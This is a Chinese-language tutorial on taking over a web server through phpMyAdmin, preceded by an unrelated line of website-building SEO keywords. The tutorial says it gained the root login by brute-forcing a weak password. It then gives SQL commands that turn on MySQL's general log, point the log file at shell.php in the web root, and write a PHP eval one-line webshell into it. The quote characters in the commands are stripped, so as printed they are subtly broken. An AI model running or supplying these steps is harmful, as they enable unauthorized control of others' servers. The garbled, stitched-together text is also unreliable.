做网站怎么添加关键词,网站子栏目设计,企业网站都是静态的吗,专业的企业网站建设公司phpMyAdmin简介phpMyAdmin 是众多MySQL图形化管理工具中使用最为广泛的一种#xff0c;是一款使用PHP 开发的基于B/S模式的MySQL客户端软件#xff0c;该工具是基于 Web 跨平台的管理程序#xff0c;并且支持简体中文#xff0c;用户可以在官网上下载最新版本的。GetSHELL前…phpMyAdmin简介phpMyAdmin 是众多MySQL图形化管理工具中使用最为广泛的一种是一款使用PHP 开发的基于B/S模式的MySQL客户端软件该工具是基于 Web 跨平台的管理程序并且支持简体中文用户可以在官网上下载最新版本的。GetSHELL前提1、phpMyAdmin利用日志文件GetSHELL前提账号必须有可读可写权限2、MySQL版本大于5.0MySQL 5.0版本以上会创建日志文件我们通过修改日志文件的全局变量就可以GetSHELL3、满足上方两个条件还需要知道网站的绝对路径,对于网站的绝对路径查找有很多方法在我上一篇文章里有讲解到传送门GetSHELL过程这边是通过php探针获取到了网站的绝对路径:C:/phpStudy/WWW接着是通过弱口令爆破来得到了phpMyAdmin的登陆账号密码:root进入到phpMyAdmin管理页面后得到一些关键信息数据库服务器:服务器: localhost via TCP/IP软件: MySQL软件版本: 5.5.40 - MySQL Community Server (GPL)协议版本: 10用户: rootlocalhost服务器字符集: UTF-8 Unicode (utf8)网站服务器Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.2.17数据库客户端版本: libmysql - 5.0.51aPHP 扩展: mysqli 文档得知MySQL的版本是大于5.0那么应该可以通过日志写入shell查看日志的信息show variables like %general%;日志读写默认是关闭的OFF,然后我们打开日志读写功能打开general_log日志读写功能SET GLOBAL general_logon创建文件由于之前我们通过php探针得到了网站的绝对路径然后我们就可以写入shell.php到网站的根目录下SET GLOBAL general_log_fileC:/phpStudy/WWW/shell.php这个时候对应的路径下就会生成一个shell.php脚本文件写入一句话到shell.phpPHP一句话木马1?php eval($_POST[liuwx]);?写入一句话语句1SELECT ?php eval($_POST[liuwx]);?这个时候就成功写入一句话到了shell.php里成功GetSHELL:
